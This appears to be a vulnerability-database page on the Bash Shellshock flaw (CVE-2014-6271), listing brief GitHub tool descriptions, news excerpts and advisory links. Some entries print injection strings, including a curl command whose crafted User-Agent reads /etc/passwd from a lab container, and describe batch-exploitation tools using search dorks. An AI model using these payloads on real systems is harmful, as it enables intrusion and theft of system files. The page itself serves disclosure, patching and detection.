Shellshock Burp Plugin A burp plugin to provide active scanning for CVE-2014-6271 against Apache's MOD_CGI Download Compiled to Java 6 for luddites and the like Download here! Building mvn package

ss-6271 Shell Shock CVE-6271 test script This quickly-written script comes pre-packed with the October 2015 release update of Weakerthan Linux 6 I coded it after taking the Pentesterlab's course on CVE-6271 Shell Shock: (pentesterlabcom/exercises/cve-2014-6271/course) dependencies gnome-terminal nc Bash

A scanner for SIP proxies vulnerable to Shellshock Usage: sipshock [ Flags ] [ IP Addresses ] Usage flags: lhost : Local listening address lport : Local listening port (default 10111) rport : Remote port (default 5060) The exec module in Kamailio, Opensips and propably every other SER fork passes the received SIP headers as environment variables to the invoking shell This

Shellshock ( Bash CVE-2014-6271 ) Remote Command Execution Injector Overview A critical vulnerability has been reported in the GNU Bourne-Again Shell (Bash), the common command-line shell used in many Linux/UNIX operating systems and Apple’s Mac OS X The flaw could allow an attacker to remotely execute shell commands by attaching malicious code in environment variables u

update Bash on Debian / Ubuntu and RedHat I copied this code from raymiiorg/s/articles/Patch_CVE-2014-6271_Shellshock_with_Ansiblehtml Thanks to Remy van Elst for writing this code I wanted to learn Ansible for a while now and want to and this example was really helpful If you want to make this work for your servers, you'll need to have a an Ansible Inventory F

bash-32 for OS X 109 and 1010 NOTE WELL: This software is not applicable to 1011 unless disabling the File System Protections GNU bash for OS X Current version: 3257 NOTE: EXPERIMENTAL: functions from environment variables are NOT imported as default when the import-functions option is compiled The master branch has this option enabled, for better security You can v

Evil-Shock Description Evil-Shock is a powerful tool made to exploit Shellshock, what's special with Evil-Shock is that it doesn't base his attacks on one parameter, example another tool might inject a simple "echo Vulnerable" and see if the server executes that In many case the server wont execute that command but can execute another command ;) Evil-Shock

VulnerabilityDB Consolidation of public domain data for effective vulnerability assessment and patch management More details at [Common Sense Security(polaris-aablogspotcom/) Getting Started The dumpgz are VunlerabilityDB dump Uncompress this file and load it into mariadb or mysql to access the content Prerequisites MariaDB or MySQL server is required to load the

ss-6271 Shell Shock CVE-6271 test script This quickly-written script comes pre-packed with the October 2015 release update of Weakerthan Linux 6 I coded it after taking the Pentesterlab's course on CVE-6271 Shell Shock: (pentesterlabcom/exercises/cve-2014-6271/course) dependencies gnome-terminal nc Bash

another_shellshock_test Some scripts to test for the "ShellShock" vulnerability (CVE-2014-6271) The codename for this scripts is SHIT (SHellshock Injection Test) harrharr Please only use this script in environments where you are allowed to shellshock_localsh Test for the two known (by me) version of this vulnerability on the local system: env x='() { :;}; ec

KaliToolsPlus 一键安装github上的渗透工具集 脚本放到/opt目录下执行 安装程序包括: 1)cheat:Linux命令行帮助工具,有单独示例帮助理解命令,支持的命令cheat -l 2)masscan:大规模扫描工具 3)xsscapy:XSS扫描工具 4)ufonet:Web的压力测试工具 5)Hangman:一个密码生成器 6)ActiveScanPlusPlus:CVE-20

bash Cookbook This cookbook keeps bash packages latest version CVE-2014-6271 seclistsorg/oss-sec/2014/q3/649 Requirements packages apt - manage packages in ubuntu and debian yum - manage packages in RHEL family Usage Just include bash in your node's run_list: { "name":"my_node", "run_list": [ "recipe[bash]" ] }

bashbug-shellshock-test This offline tool is not supported and is provided for informational purposes only This tool is dependent on Python 27 ''' ' ' Shellshock Test - CVE-2014-6271 ' Written by Tripwire VERT (wwwtripwirecom/vert) ' ' This offline tool is not supported and is provided for informational purposes only ' T

shellshock-exploit this script for exploit #cve-2014-6271, NOTE you should edit the target HTB:wwwhacktheboxeu/home/users/profile/14397 Twitter: twittercom/MoayadAlmalat

Auto Vulnerability Tester An extensible automated vulnerability testing framework written in Python3 by Nicholas Lochner for CS460 at the University of Illinois at Urbana-Champaign All code was written by Nicholas Lochner, except for "heartbleedpy", which is a modified version of the Heartbleed proof of concept by Jared Stafford The source is licensed under the GNU

kbash Exploit GNU Bash Env Command Injection via Google CVE-2014-6271 Version 21 usage Batch Exploit GNU Bash Env Command Injection base on Google Version 21 optional arguments: -h, --help show this help message and exit -u URL specific a single Target Url -d DORK Custom Google Dork,Using Google Search to find targets -t THREAD_COUNT thre

cyber-range-target This role endeavors to simplify building a host for a cyber range This role is for assessment purposes only Note: This has the potential to render a host vulnerable Use with care Requirements Ansible 24 Role Variables --- # defaults file for cyber-range-target # Which CVE's should be tested on a host cves_to_test: [] selinux_state: enforcing Depe

Pwnable Where Nick tries to hack and constantly fails No peeking, there be spoilers below! Toddler's Bottle fd #include &lt;stdioh&gt; #include &lt;stdlibh&gt; #include &lt;stringh&gt; char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc&lt;2){ printf("pass argv[1] a number\n"); return 0; } // Convert argv[1

RBE Remote Bash Execution This POC (proof of concept) is for EDUCATIONAL PURPOSES ONLY! Please, do not use it with wrong intents in mind We set up a simple PHP website and a Python executable that exploits the bash shellshock vulnerability Development Please note that all the following tests were done in a local controlled environment for educational purposes only Do NOT do

Project 9 - Honeypots Honeypots Deployed: I used the Modern Honey Network (MHN) to complete the assignment for Week 9 In total, I created five Ubuntu 1404 honeypots All of the honeypots, including the MHN admin web application, were hosted in the Google Cloud Honeypots: Ubuntu 1404- Dionaea with HTTP: Goal is to trap malware that exploits vulnerabilties in an exposed net

bash Some bash scripts I use Updated to include a quick test for CVE-2014-6271 (Shellshock) #!/bin/sh if [ "$SHELL" = "/bin/bash" ] then echo "You are using Bash" echo "$BASH_VERSION" env test='() { :; }; echo This version is vulnerable' bash -c 'echo ' fi I added a Wiki article that describes the settings I us

Vulnerability as a Service - CVE 2014-6271 A Debian (Wheezy) Linux system with a vulnerable version of bash and a web application to showcase CVS-2014-6271, aka Shellshock Overview This docker container is based on Debian Wheezy and has been modified to use a vulernable version of Bash (bash_42:2b:dfsg-01) A web application is available via Apache 2 and serves a CGI scri

CVE-2014-6271_Test CVE-2014-6271_Test Obviously, this project is used to check if a server with cgi enabled is affected with CVE-2014-6271(aka shellshock) Dependency Need GoogleSearchCrawler Usage eg: python exppy -g wwwgooglecom This will test urls collected from google search result with keyword in file keywords run python exppy to see details

bashfix (for OSX) copied from StackOverflow answer here : applestackexchangecom/questions/146849/how-do-i-recompile-bash-to-avoid-shellshock-the-remote-exploit-cve-2014-6271-an/146851#146851 Usage git clone githubcom/yanicklandry/bashfixgit ~/bashfix chmod a+x ~/bashfix/bash_fixsh ~/bashfix/bash_fixsh Test After executing : env x='() { :;}; echo vulne

ShellShockAttacker ShellShockAttacker Is A Windows GUI program allows you to send ShellShock payloads to be executed in an infected server PlatForm   :      Windows CVE           :     CVE-2014-6271 License     :      Free Wiki         &n

ShellShock Detector for Bro This script detects successful exploitation of the Bash vulnerability with CVE-2014-6271 nicknamed "ShellShock" It's more comprehensive than most of the detections around in that it's watching for behavior from the attacked host that might indicate successful compromise or actual vulnerability If a host is seen receiving an att

docker_CVE-2014-6271 docker build -t DOCKERIMAGENAME /path/to/dockerfile_directory docker run -it -d -p 8080:80 DOCKERIMAGENAME verify execution with: docker ps verify web server execution: localhost:8080 exploit vulnerability : curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \localhost:8080/cgi-bin/vulnerable

CVE-2014-6271 Bash vulnerables ex: env 'VAR=() { :;}; echo Bash is vulnerable!' 'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test" i make script for u : how to use bash scannersh listofwebsitetxt

Shellshock Test ShellShock test checks for the recent CVE-2014-6271 Live : wwwdr4cun0com/shellshock/ Prerequisites : Apache Server running php If you want to use my proxy,contact me Questions and suggestions can be sent to : dhaval(at)dr4cun0com

Shellshock exploit + vulnerable environment Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014 Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbi

Awesome Hacking A curated list of awesome Hacking Inspired by awesome-machine-learning If you want to contribute to this list (please do), send me a pull request or contact me @carpedm20 For a list of free hacking books available for download, go here Table of Contents System Tutorials Tools Docker General Reverse Engineering Tutorials Tools General Web Tools Netwo

ShellScan ShellScan - A simple Shellshock Vulnerability Scanner in python allows cyber security researchers to explore and discover new application and systems that vulnerable to the ShellShock exploit ShellScan supports different BASH vulnerabilities: CVE-2014-6271 and CVE-2014-6278 to be tested by cyber security researchers in order to explore and discover new applications a

Detailed description and usage, see: weibocom/1363173330/BoKSHl0YE CVE-2014-6271 CVE-2014-7169 remote code execution through bash twittercom/taviso/status/514887394294652929 官方补丁不靠谱,这个修复了绕过问题。 成功patch了bash 42 版本

Awesome Penetration Testing A collection of awesome penetration testing resources This project is supported by Netsparker Web Application Security Scanner Penetration testing is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities Your contributions and

awesome-web-hacking This list is for anyone wishing to learn about web application security but do not have a starting point You can help by sending Pull Requests to add more information If you're not inclined to make PRs you can tweet me at @infoslack Table of Contents Books Documentation Tools Cheat Sheets Docker Vulnerabilities Courses Online Hacking Demonstration Si

Recent Articles

IT threat evolution Q3 2014
Securelist • David Emm Maria Garnaeva Victor Chebyshev Roman Unuchek Denis Makrushin Anton Ivanov • 18 Nov 2014

PDF version
In July we published our in-depth analysis into a targeted attack campaign that we dubbed ‘Crouching Yeti’. This campaign is also known as ‘Energetic Bear’.
This campaign, which has been active since late 2010, has so far targeted the following sectors:  industrial/machinery, manufacturing, pharmaceutical, construction, education and information technology.  So far there have been more than 2,800 victims worldwide, and we have been able to identify 101 d...

VXers Shellshocking embedded BusyBox boxen
The Register • Darren Pauli • 17 Nov 2014

It's 2014 and some people are still using default user names and passwords

Malware writers have crafted new wares to attack embedded devices running BusyBox and not yet patched against the ShellShock vulnerability, researcher Rhena Inocencio says.
Miscreants' tool of choice for such attacks is malware called "Bashlite" that, once executed on a victim machine, probes for devices such as routers and Android phones running BusyBox to brute force logins through a preset list of usernames and passwords.
Trend Micro's Inocencio said the variant would download and...

Researcher Takes Wraps off Two Undisclosed Shellshock Vulnerabilities in Bash
Threatpost • Michael Mimoso • 03 Oct 2014

The Bash bug has kept Linux and UNIX administrators busy deploying a half-dozen patches, worrying about numerous Shellshock exploits in the wild, and a laboring over a general uncertainty that the next supposed fix will break even more stuff.
Researcher Michal Zalewski, a longtime bug-hunter, has been front and center on some of the Bash research and last week said he had found two additional bugs in the Bourne Again Shell, details of which he’d kept to himself until yesterday.
Za...

VMware Begins to Patch Bash Issues Across Product Line
Threatpost • Chris Brook • 01 Oct 2014

Much like Heartbleed triggered vendors to issue out of band patches to remedy vulnerabilities that popped up earlier this year, Shellshock, the Bash vulnerability, has forced vendors’ hands in a similar fashion.
Virtualization firm VMware issued a progress report on fixes for four different types of products as they relate to the bug on Monday.
For the most part the company still has its hands full.
According to yesterday’s security advisory, it’s currently in the middle ...

Third patch brings more admin Shellshock for the battered and Bashed
The Register • Darren Pauli • 30 Sep 2014

'Okay we got it THIS time'

A third patch, from Red Hat engineer Florian Weimer, has been released for the vulnerable Bash Unix command-line interpreter, closing off flaws found in two previous fixes.
Weimer's unofficial fix was adopted upstream by Bash project maintainer Chet Ramey and released as Bash-4.3 Official Patch 27 (bash43-027) which addressed a bunch of previously undisclosed flaws including two remote exploit bugs.
The first patch (CVE-2014-6271) released Wednesday when the Shellshock flaw dropped w...

SHELLSHOCKED: Fortune 1000 outfits Bash out batches of patches
The Register • John Leyden • 29 Sep 2014

CloudPassage points to 'pervasive' threat of Bash bug

The majority of Fortune 1000 and Global 2000 companies have already deployed, or are now deploying, Shellshock patches to fend off code attacks, according to cloud security firm CloudPassage.
The Shellshock vulnerability allows remote attackers to execute arbitrary code on servers using a variety of techniques, with the CVE-2014-6271 weakness in the Bourne-Again Shell (Bash) affecting most Unix and Linux-based systems.
"The Shellshock vulnerability is one of the most pervasive threat...

Oracle SHELLSHOCKER - data titan lists unpatchables
The Register • Neil McAllister in San Francisco • 27 Sep 2014

Database kingpin lists 32 products that can't be patched (yet) as GNU fixes second vuln

Oracle has confirmed that at least 32 of its products are affected by the vulnerability recently discovered in the Bash command-line interpreter – aka the "Shellshock" bug – including some of the company's pricey integrated hardware systems.
The database giant issued a security alert regarding the issue on Friday, warning that many Oracle customers will have to wait awhile longer to receive patches.
"Oracle is still investigating this issue and will provide fixes for affected pro...

Stunned by Shellshock Bash bug? Patch all you can – or be punished
The Register • John Leyden • 26 Sep 2014

UK data watchdog rolls up its sleeves, polishes truncheon

Updated The UK's privacy watchdog is urging organisations to protect their systems against the infamous Shellshock vulnerability in Bash – even though the full scope of the security bug remains unclear.
The Shellshock flaw affects Bash up to and including version 4.3. It's a vital component of many Linux and Unix systems, as well as networking kit and embedded devices. It's also present in the latest versions of Apple's OS X for Macs.
The flaw allows hackers to execute arbitrary co...

Shellshock and its early adopters
Securelist • Stefan Ortloff • 26 Sep 2014

Shortly after disclosure of the Bash bug called “Shellshock” we saw the first attempts by criminals to take advantage of this widespread vulnerability also known as CVE-2014-6271.
The most recent attempts we see to gain control of webservers just create a new instance of bash and redirect it to a remote server listening on a specific TCP port. This is also known as a reverse-connect-shell. Here’s an example of how this attack appears in a webserver logfile:

The atta...

How to resolve Shellshock on Mac OS X, web servers and more
welivesecurity • Stephen Cobb • 25 Sep 2014

A serious software vulnerability called the “Bash Bug” or “Shellshock” has just come to light and it affects a wide range of computers and digital devices, many of which will need to be fixed to prevent them leaking information or being taken over by malicious persons. The systems affected include Mac OS X computers, many web servers, and some home networking devices like routers. This blog post offers some preliminary advice about what to do in response to Shellshock, as well as links t...

Hackers thrash Bash Shellshock bug: World races to cover hole
The Register • John Leyden • 25 Sep 2014

Update your gear now to avoid early attacks hitting the web

Sysadmins and users have been urged to patch the severe Shellshock vulnerability in Bash on Linux and Unix systems – as hackers ruthlessly exploit the flaw to compromise or crash computers.
But as "millions" of servers, PCs and devices lay vulnerable or are being updated, it's emerged the fix is incomplete.
The flaw affects the GNU Bourne Again Shell – better known as Bash – which is a widely installed command interpreter used by many Linux and Unix operating systems – includ...

“Bash” (CVE-2014-6271) vulnerability – Q&A
Securelist • GReAT • 25 Sep 2014

The “bash” vulnerability, actually described as CVE-2014-6271, is an extremely powerful vulnerability due to its high impact and the ease with which it can be exploited. An attacker can simply execute system level commands, with the same privileges as the affected services.
In most of the examples on the Internet right now, attackers are remotely attacking web servers hosting CGI scripts that have been written in bash or pass values to shell scripts.
At the time of writing, the v...

Bash Exploit Reported, First Round of Patches Incomplete
Threatpost • Michael Mimoso • 25 Sep 2014

The urgency to patch systems against the Bash zero-day vulnerability has been cranked to 10 after reports of an exploit in the wild have been made public by AusCERT, the Computer Emergency Response Team of Australia.
This seems to reflect a similar finding posted by a researcher who goes by the handle Yinette who found a malware sample that points to a bot being distributed by the exploit.
Other researchers, including David Jacoby of Kaspersky Lab, right and podcast below, and Robert...

Patch Bash NOW: 'Shellshock' bug blasts OS X, Linux systems wide open
The Register • John Leyden • 24 Sep 2014

CGI scripts to DHCP clients hit by Heartbleed-grade remote-code exec vuln

Updated A bug discovered in the widely used Bash command interpreter poses a critical security risk to Unix and Linux systems – and, thanks to their ubiquity, the internet at large.
It lands countless websites, servers, PCs, OS X Macs, various home routers, and more, in danger of hijacking by hackers.
The vulnerability is present in Bash up to and including version 4.3, and was discovered by Stephane Chazelas. It puts Apache web servers, in particular, at risk of compromise: CGI sc...

References

CWE-78http://advisories.mageia.org/MGASA-2014-0388.htmlhttp://archives.neohapsis.com/archives/bugtraq/2014-10/0101.htmlhttp://jvn.jp/en/jp/JVN55667175/index.htmlhttp://jvndb.jvn.jp/jvndb/JVNDB-2014-000126http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10673http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.htmlhttp://linux.oracle.com/errata/ELSA-2014-1293.htmlhttp://linux.oracle.com/errata/ELSA-2014-1294.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00028.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00029.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00034.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00037.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00040.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00044.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00049.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-10/msg00004.htmlhttp://lists.opensuse.org/opensuse-updates/2014-10/msg00023.htmlhttp://lists.opensuse.org/opensuse-updates/2014-10/msg00025.htmlhttp://marc.info/?l=bugtraq&m=141216207813411&w=2http://marc.info/?l=bugtraq&m=141216668515282&w=2http://marc.info/?l=bugtraq&m=141235957116749&w=2http://marc.info/?l=bugtraq&m=141319209015420&w=2http://marc.info/?l=bugtraq&m=141330425327438&w=2http://marc.info/?l=bugtraq&m=141330468527613&w=2http://marc.info/?l=bugtraq&m=141345648114150&w=2http://marc.info/?l=bugtraq&m=141383026420882&w=2http://marc.info/?l=bugtraq&m=141383081521087&w=2http://marc.info/?l=bugtraq&m=141383138121313&w=2http://marc.info/?l=bugtraq&m=141383196021590&w=2http://marc.info/?l=bugtraq&m=141383244821813&w=2http://marc.info/?l=bugtraq&m=141383304022067&w=2http://marc.info/?l=bugtraq&m=141383353622268&w=2http://marc.info/?l=bugtraq&m=141383465822787&w=2http://marc.info/?l=bugtraq&m=141450491804793&w=2http://marc.info/?l=bugtraq&m=141576728022234&w=2http://marc.info/?l=bugtraq&m=141577137423233&w=2http://marc.info/?l=bugtraq&m=141577241923505&w=2http://marc.info/?l=bugtraq&m=141577297623641&w=2http://marc.info/?l=bugtraq&m=141585637922673&w=2http://marc.info/?l=bugtraq&m=141694386919794&w=2http://marc.info/?l=bugtraq&m=141879528318582&w=2http://marc.info/?l=bugtraq&m=142113462216480&w=2http://marc.info/?l=bugtraq&m=142118135300698&w=2http://marc.info/?l=bugtraq&m=142358026505815&w=2http://marc.info/?l=bugtraq&m=142358078406056&w=2http://marc.info/?l=bugtraq&m=142546741516006&w=2http://marc.info/?l=bugtraq&m=142719845423222&w=2http://marc.info/?l=bugtraq&m=142721162228379&w=2http://marc.info/?l=bugtraq&m=142805027510172&w=2http://packetstormsecurity.com/files/128517/VMware-Security-Advisory-2014-0010.htmlhttp://packetstormsecurity.com/files/128567/CA-Technologies-GNU-Bash-Shellshock.htmlhttp://packetstormsecurity.com/files/128573/Apache-mod_cgi-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/137376/IPFire-Bash-Environment-Variable-Injection-Shellshock.htmlhttp://rhn.redhat.com/errata/RHSA-2014-1293.htmlhttp://rhn.redhat.com/errata/RHSA-2014-1294.htmlhttp://rhn.redhat.com/errata/RHSA-2014-1295.htmlhttp://rhn.redhat.com/errata/RHSA-2014-1354.htmlhttp://seclists.org/fulldisclosure/2014/Oct/0http://secunia.com/advisories/58200http://secunia.com/advisories/59272http://secunia.com/advisories/59737http://secunia.com/advisories/59907http://secunia.com/advisories/60024http://secunia.com/advisories/60034http://secunia.com/advisories/60044http://secunia.com/advisories/60055http://secunia.com/advisories/60063http://secunia.com/advisories/60193http://secunia.com/advisories/60325http://secunia.com/advisories/60433http://secunia.com/advisories/60947http://secunia.com/advisories/61065http://secunia.com/advisories/61128http://secunia.com/advisories/61129http://secunia.com/advisories/61188http://secunia.com/advisories/61283http://secunia.com/advisories/61287http://secunia.com/advisories/61291http://secunia.com/advisories/61312http://secunia.com/advisories/61313http://secunia.com/advisories/61328http://secunia.com/advisories/61442http://secunia.com/advisories/61471http://secunia.com/advisories/61485http://secunia.com/advisories/61503http://secunia.com/advisories/61542http://secunia.com/advisories/61547http://secunia.com/advisories/61550http://secunia.com/advisories/61552http://secunia.com/advisories/61565http://secunia.com/advisories/61603http://secunia.com/advisories/61633http://secunia.com/advisories/61641http://secunia.com/advisories/61643http://secunia.com/advisories/61654http://secunia.com/advisories/61676http://secunia.com/advisories/61700http://secunia.com/advisories/61703http://secunia.com/advisories/61711http://secunia.com/advisories/61715http://secunia.com/advisories/61780http://secunia.com/advisories/61816http://secunia.com/advisories/61855http://secunia.com/advisories/61857http://secunia.com/advisories/61873http://secunia.com/advisories/62228http://secunia.com/advisories/62312http://secunia.com/advisories/62343http://support.apple.com/kb/HT6495http://support.novell.com/security/cve/CVE-2014-6271.htmlhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bashhttp://www-01.ibm.com/support/docview.wss?uid=isg3T1021272http://www-01.ibm.com/support/docview.wss?uid=isg3T1021279http://www-01.ibm.com/support/docview.wss?uid=isg3T1021361http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004879http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004897http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004898http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004915http://www-01.ibm.com/support/docview.wss?uid=swg21685541http://www-01.ibm.com/support/docview.wss?uid=swg21685604http://www-01.ibm.com/support/docview.wss?uid=swg21685733http://www-01.ibm.com/support/docview.wss?uid=swg21685749http://www-01.ibm.com/support/docview.wss?uid=swg21685914http://www-01.ibm.com/support/docview.wss?uid=swg21686084http://www-01.ibm.com/support/docview.wss?uid=swg21686131http://www-01.ibm.com/support/docview.wss?uid=swg21686246http://www-01.ibm.com/support/docview.wss?uid=swg21686445http://www-01.ibm.com/support/docview.wss?uid=swg21686447http://www-01.ibm.com/support/docview.wss?uid=swg21686479http://www-01.ibm.com/support/docview.wss?uid=swg21686494http://www-01.ibm.com/support/docview.wss?uid=swg21687079http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5096315http://www.debian.org/security/2014/dsa-3032http://www.kb.cert.org/vuls/id/252743http://www.mandriva.com/security/advisories?name=MDVSA-2015:164http://www.novell.com/support/kb/doc.php?id=7015701http://www.novell.com/support/kb/doc.php?id=7015721http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.htmlhttp://www.qnap.com/i/en/support/con_show.php?cid=61http://www.securityfocus.com/archive/1/533593/100/0/threadedhttp://www.securityfocus.com/bid/70103http://www.ubuntu.com/usn/USN-2362-1http://www.us-cert.gov/ncas/alerts/TA14-268Ahttp://www.vmware.com/security/advisories/VMSA-2014-0010.htmlhttp://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0https://access.redhat.com/articles/1200223https://access.redhat.com/node/1200223https://bugzilla.redhat.com/show_bug.cgi?id=1141597https://help.ecostruxureit.com/display/public/UADCO8x/StruxureWare+Data+Center+Operation+Software+Vulnerability+Fixeshttps://kb.bluecoat.com/index?page=content&id=SA82https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648https://kc.mcafee.com/corporate/index?page=content&id=SB10085https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/https://support.apple.com/kb/HT6535https://support.citrix.com/article/CTX200217https://support.citrix.com/article/CTX200223https://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.htmlhttps://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-c04497075https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-c04518183https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673&src=securityAlertshttps://www.exploit-db.com/exploits/34879/https://www.exploit-db.com/exploits/37816/https://www.exploit-db.com/exploits/38849/https://www.exploit-db.com/exploits/39918/https://www.exploit-db.com/exploits/40619/https://www.exploit-db.com/exploits/40938/https://www.exploit-db.com/exploits/42938/https://www.suse.com/support/shellshock/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2014-1295https://www.rapid7.com/db/vulnerabilities/apple-osx-bash-cve-2014-7169https://usn.ubuntu.com/2362-1/https://nvd.nist.govhttps://www.exploit-db.com/exploits/40938/http://tools.cisco.com/security/center/viewAlert.x?alertId=35845